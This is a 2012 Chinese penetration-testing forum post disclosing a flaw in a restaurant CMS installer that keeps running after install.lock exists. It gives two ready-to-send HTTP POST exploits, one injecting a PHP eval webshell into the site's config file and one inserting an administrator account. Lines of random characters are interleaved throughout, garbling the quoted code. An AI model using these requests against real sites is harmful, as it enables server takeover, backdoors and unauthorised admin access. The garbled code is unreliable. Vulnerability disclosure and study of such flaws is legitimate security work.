中国网络渗透测试联盟
标题:
口福科技餐厅cms漏洞(可getshell)
[打印本页]
作者:
admin
时间:
2012-12-4 11:13
标题:
口福科技餐厅cms漏洞(可getshell)
问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
: x/ r4 \* Z6 ^# g- }5 s
5 V' c1 ^' M& \5 f+ o$ R. o
<?php
" J* Q, u% p7 a6 ]; d) J
if(file_exists("../install.lock"))
& h% o) P* W/ j* @0 |& G# f# R
{
; s" B: B8 m+ U2 c) `# t& k# [$ g
header("Location: ../");//没有退出
2 E1 [& J$ b* U- s; K! h4 a
}
8 B9 W' ]; u: z5 h9 n; E
( I" x1 r+ s6 M
//echo 'tst';exit;
8 d/ ^/ g3 \! [
require_once("init.php");
. R- |6 i, e% O9 L, D& h
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
0 j% i! N$ v! N0 l* f! }
{
r, T6 y4 \, R7 _
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
5 m9 y b- j! k% f
- ^) H8 N* m+ O2 a) l0 Y
1、getshell(很危险)
& [' p, P5 K5 D! q/ o4 S
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
3 u/ k; G- h, {. P$ `
{
0 c1 K+ @* h& w$ ?- e
$smarty->assign("step",1);
c8 m1 H9 p! k) o$ t4 T
$smarty->display("index.html");
# M8 e v, Z1 H2 n6 `
}elseif($_REQUEST['step']==2)
8 C1 W* |* ~ n
{
& K4 g" S: n* J0 g+ ~- [, K
$mysql_host=trim($_POST['mysql_host']);
% i) W9 A2 f$ q
$mysql_user=trim($_POST['mysql_user']);
4 N) m8 u" h5 U' Y- h/ S
$mysql_pwd=trim($_POST['mysql_pwd']);
1 I7 y, d; E9 t" J# W- c% R* \; `; {
$mysql_db=trim($_POST['mysql_db']);
* O1 L) W" O7 |$ e+ y! Z* M
$tblpre=trim($_POST['tblpre']);
( P1 l6 c- R8 I
$domain==trim($_POST['domain']);
* ?( A- m- {* T: V- ^- f6 P) X2 G
$str="<?php \r\n";
% ~ E( O3 j1 w- A& k i9 G
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
: O$ {+ j3 c' d- T2 M
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
y3 F: {8 f5 Y c$ I
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
/ T- L8 h) L; L2 b& A* C
$str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
) @+ _& l' d/ s& |8 c' W
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
* G1 T' x3 K! h. z3 s
$str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
4 V5 Y% i3 n# f6 ]9 [! I4 U
$str.='define("DOMAIN","'.$domain.'");'."\r\n";
; P Y, z, |' G1 [5 R4 ?1 |
$str.='define("SKINS","default");'."\r\n";
S. Z1 ]) Y4 j6 B) q
$str.='?>';
2 C# {. }. X7 o+ t8 E3 O
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
4 q8 X: G' G: V' b' i
上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
9 q* Y' s7 ], A6 |. X+ ?$ I" I8 y! Y
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
' K' M" {( G3 X: o1 {) ]5 u ^
Host: 192.168.80.129
3 V7 U# d$ _* k1 k! e# H
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
: `4 [* S8 `4 L: {. U$ s5 X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
1 a+ h% Z2 j8 D
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
4 T; a) c) f2 g! D2 t7 l5 U# E
Accept-Encoding: gzip, deflate
5 {0 o; R: |3 C7 a
Referer:
http://192.168.80.129/canting/install/index.php?step=1
/ ^& a/ L; {1 N+ R w9 [/ Q
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
+ [ g- f! V: W1 d9 Y @' i
Content-Type: application/x-www-form-urlencoded
6 B* p2 m* p K6 k y. \
Content-Length: 126
" d9 Q8 O4 j8 Z9 q+ a0 n5 k1 ^
) U4 a! w3 v; \$ g+ F8 U9 K2 n+ o
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
( A! S: e8 i* e: N# g b
但是这个方法很危险,将导致网站无法运行。
2 f# s4 Q: D* \5 f
. W; J; r( [- M4 @/ I. r
2、直接添加管理员
. c5 Y9 r9 P5 ?/ Q7 u
6 K8 G: N2 i7 O5 [ S
elseif($_REQUEST['step']==5)
) \( j6 A0 U. q: n6 P, a6 @" j5 }& n
{
! q3 k+ U& {7 V: i
if($_POST)
) ?9 u3 {/ S' l- ]4 Y
{ require_once("../config/config.inc.php");
" c9 H4 [; b+ A6 k9 R8 O5 _
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
3 h5 f% T- h2 r' X
mysql_select_db(MYSQL_DB,$link);
+ F/ e3 s" w/ }: z/ l6 S
mysql_query("SET NAMES ".MYSQL_CHARSET );
# y0 F, N- ^; B% t3 @
mysql_query("SET sql_mode=''");
+ A4 m8 P& M& s1 P9 `0 h+ c' m
3 M' D4 K. J3 k
$adminname=trim($_POST['adminname']);
! }2 k0 U/ h0 t. H: a- s
$pwd1=trim($_POST['pwd1']);
, e* {3 w9 j% w: g% h' E
$pwd2=trim($_POST['pwd2']);
8 r8 c# h: ~2 O2 A1 j- q
if(empty($adminname))
7 \1 T' N0 h A& l3 e
{
, V0 ?# ~& v5 l3 h5 r: r; |3 _
0 A) {+ D4 ]3 }
echo "<script>alert('管理员不能为空');history.go(-1);</script>";
4 p7 O2 {+ [2 g3 W1 m/ Q0 ^
exit();
9 Y- O7 W0 p. d" k1 M1 j- r
}
/ r. v1 ?" e9 |, D
if(($pwd1!=$pwd2) or empty($pwd1))
! x: D1 c% h5 p c, D
{
+ p- A. A3 W- w: x; {# V: w! Y
echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
. E P, k# U9 p' B$ c" P6 N
}
% h% h$ m; m- T* h1 i$ z, H: `
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
/ r$ u4 M" M8 h9 ?7 e' z0 Y7 J& F
}
/ L# }+ c! J* p) |; j. _4 c
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:
: Z8 J y0 ]4 n
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
1 v; O6 Y) {% L. ~1 I
Host: 192.168.80.129
' J' [1 R' Z& A
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
# _/ _( _9 Y: d3 t p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
9 [- A q% y! N1 h7 Q
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
" C; y F% F/ E9 f7 [9 }) o
Accept-Encoding: gzip, deflate
; J& V; H1 D' K7 N# t
Referer:
http://www.2cto.com
/canting/install/index.php?step=1
* S$ g4 L% o9 |. Y9 N; U( Z* W
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
/ z* w3 c" B. R1 v0 I( f% C
Content-Type: application/x-www-form-urlencoded
" N q+ z' }4 n: h
Content-Length: 46
, T: F7 N' h3 Q9 v. E O, _; a4 M
# {/ L, A+ d9 |8 u _5 c, N. T
adminname=qingshen&pwd1=qingshen&pwd2=qingshen
" |- |+ H+ E0 l8 k# I
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2